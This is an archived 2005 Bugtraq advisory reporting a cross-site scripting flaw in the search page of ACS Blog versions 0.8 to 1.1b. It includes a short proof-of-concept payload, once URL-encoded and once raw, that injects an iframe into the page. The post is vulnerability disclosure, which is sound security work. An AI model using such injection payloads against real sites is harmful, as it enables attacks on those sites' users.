[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: XSS in ACS blog
From: farhad koosha <farhadkey () yahoo ! com>
Date: 2005-03-17 8:24:01
Message-ID: 20050317082401.8600.qmail () www ! securityfocus ! com
[Download RAW message or body]
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E
or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic